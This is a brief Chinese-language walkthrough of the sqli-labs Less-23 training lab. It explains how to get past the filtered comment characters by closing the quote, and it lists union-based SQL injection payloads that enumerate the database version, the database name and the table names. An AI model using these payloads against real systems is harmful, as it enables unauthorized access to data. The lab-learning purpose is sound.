#sqli-labs less 23

这一关的与第一关的区别有两个，一个是注释符# --+被过滤了

所以我们得闭合第二个单引号

另一个区别是不能用order by 来判断字段数了

具体原因请参照 https://www.jianshu.com/p/2602430f8ee4

’ union select 1,2,3,4 or ‘1’='1

’ union select 1,version(),3 or ‘1’='1

’ union select 1,database(),3 or ‘1’='1

剩下的跟第一关less1 差不多

’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3 or ‘1’='1